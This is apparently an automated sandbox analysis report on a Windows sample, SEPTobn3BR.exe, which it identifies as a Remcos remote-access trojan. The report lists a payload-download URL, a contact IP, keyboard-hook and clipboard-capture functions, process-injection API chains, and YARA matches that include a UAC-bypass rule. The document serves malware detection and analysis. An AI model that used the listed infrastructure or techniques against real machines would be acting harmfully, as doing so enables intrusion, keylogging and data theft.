                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A5A000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000002.1626895029.0000000020B19000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com0
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.maan2u.com/
                Source: SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020ACD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.maan2u.com/docs/233_Emxwenem
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.maan2u.com/docs/233_Emxwenemixg
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.maan2u.com/docs/233_Emxwenemixg5
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000633000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.maan2u.com/docs/233_Emxwenemixg8
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000633000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.maan2u.com:443/docs/233_Emxwenemixg
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownHTTPS traffic detected: 103.82.231.117:443 -> 192.168.2.7:49710 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_03099340 SetWindowsHookExA 0000000D,0309932C,000000005_2_03099340
                Installs a global keyboard hook
                Source: C:\Windows\SysWOW64\colorcpl.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309A65A OpenClipboard,GetClipboardData,CloseClipboard,5_2_0309A65A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A4EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_030A4EC1
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029A4EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_029A4EC1
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309A65A OpenClipboard,GetClipboardData,CloseClipboard,5_2_0309A65A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_03099468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,5_2_03099468
                Source: Yara matchFile source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812571420.00000000311A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1526792578.0000000000758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.2755366865.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030AA76C SystemParametersInfoW,5_2_030AA76C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029AA76C SystemParametersInfoW,10_2_029AA76C

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B98584 NtQueueApcThread,0_2_02B98584
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B9DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,0_2_02B9DACC
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B9DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_02B9DA44
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B9DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02B9DBB0
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B979B4 NtAllocateVirtualMemory,0_2_02B979B4
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B97D00 NtWriteVirtualMemory,0_2_02B97D00
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B98BB0 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02B98BB0
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B98BAE GetThreadContext,SetThreadContext,NtResumeThread,0_2_02B98BAE
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B979B2 NtAllocateVirtualMemory,0_2_02B979B2
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B9D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_02B9D9F0
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 7_2_02C08584 NtQueueApcThread,7_2_02C08584
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 7_2_02C0DACC NtCreateFile,NtWriteFile,NtClose,7_2_02C0DACC
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 7_2_02C0DA44 NtDeleteFile,7_2_02C0DA44
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 7_2_02C0DBB0 NtOpenFile,NtReadFile,NtClose,7_2_02C0DBB0
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 7_2_02C079B4 NtAllocateVirtualMemory,7_2_02C079B4
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 7_2_02C07D00 NtWriteVirtualMemory,7_2_02C07D00
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 7_2_02C0D9F0 NtDeleteFile,7_2_02C0D9F0
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 7_2_02C079B2 NtAllocateVirtualMemory,7_2_02C079B2
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 11_2_02C48584 NtQueueApcThread,11_2_02C48584
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 11_2_02C4DACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,11_2_02C4DACC
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 11_2_02C4DA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_02C4DA44
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 11_2_02C4DBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,11_2_02C4DBB0
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 11_2_02C479B4 NtAllocateVirtualMemory,11_2_02C479B4
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 11_2_02C47D00 NtWriteVirtualMemory,11_2_02C47D00
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 11_2_02C48BAE GetThreadContext,SetThreadContext,NtResumeThread,11_2_02C48BAE
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 11_2_02C48BB0 GetThreadContext,SetThreadContext,NtResumeThread,11_2_02C48BB0
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 11_2_02C4D9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_02C4D9F0
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 11_2_02C479B2 NtAllocateVirtualMemory,11_2_02C479B2
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B9EC74 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_02B9EC74
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A4DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,5_2_030A4DB4
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029A4DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,10_2_029A4DB4
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C163160_2_02C16316
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B820C40_2_02B820C4
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C0614F0_2_02C0614F
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C2C1350_2_02C2C135
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C066DE0_2_02C066DE
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02BFE43B0_2_02BFE43B
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C329600_2_02C32960
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02BFCEA30_2_02BFCEA3
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C06EF00_2_02C06EF0
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C1EF580_2_02C1EF58
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C12C870_2_02C12C87
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C24C8C0_2_02C24C8C
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C06D870_2_02C06D87
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C1F3B60_2_02C1F3B6
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C1F1870_2_02C1F187
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C31A970_2_02C31A97
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C17A9C0_2_02C17A9C
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02BF3E6F0_2_02BF3E6F
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030E13D45_2_030E13D4
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C52865_2_030C5286
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030B51525_2_030B5152
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030D37005_2_030D3700
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030B57FB5_2_030B57FB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C569E5_2_030C569E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C16FB5_2_030C16FB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030E050B5_2_030E050B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C65105_2_030C6510
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030DABA95_2_030DABA9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030B4BC35_2_030B4BC3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030CDBFB5_2_030CDBFB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C5AD35_2_030C5AD3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030AB9175_2_030AB917
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030B59645_2_030B5964
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030CD9CC5_2_030CD9CC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A28E35_2_030A28E3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C5F085_2_030C5F08
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030CDE2A5_2_030CDE2A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030ACEAF5_2_030ACEAF
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C4D8A5_2_030C4D8A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C3C0B5_2_030C3C0B
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 7_2_02BF20C47_2_02BF20C4
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C528610_2_029C5286
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029E13D410_2_029E13D4
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029B515210_2_029B5152
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C569E10_2_029C569E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C16FB10_2_029C16FB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029B57FB10_2_029B57FB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029D370010_2_029D3700
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C651010_2_029C6510
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029E050B10_2_029E050B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C5AD310_2_029C5AD3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029DABA910_2_029DABA9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029B4BC310_2_029B4BC3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029CDBFB10_2_029CDBFB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029A28E310_2_029A28E3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029CD9CC10_2_029CD9CC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029AB91710_2_029AB917
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029B596410_2_029B5964
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029ACEAF10_2_029ACEAF
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029CDE2A10_2_029CDE2A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C5F0810_2_029C5F08
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C3C0B10_2_029C3C0B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C4D8A10_2_029C4D8A
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: 11_2_02C320C411_2_02C320C4
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\Emxwenem.PIF 63C77A3F6CFA94CBC6A4C0C1475F02520592E58D6A03E8553E77A85A3F03C32F
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 029C2B90 appears 53 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 030C2B90 appears 53 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 030C2525 appears 41 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 029C2525 appears 41 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02992073 appears 51 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 03092073 appears 51 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: String function: 02C3480C appears 619 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: String function: 02C346A4 appears 154 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: String function: 02BF46A4 appears 154 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: String function: 02BF480C appears 619 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: String function: 02C487A0 appears 48 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: String function: 02C087A0 appears 48 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: String function: 02B844D0 appears 32 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: String function: 02B844AC appears 73 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: String function: 02B846A4 appears 244 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: String function: 02C1411C appears 44 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: String function: 02B98824 appears 45 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: String function: 02B987A0 appears 54 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: String function: 02B8480C appears 931 times
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
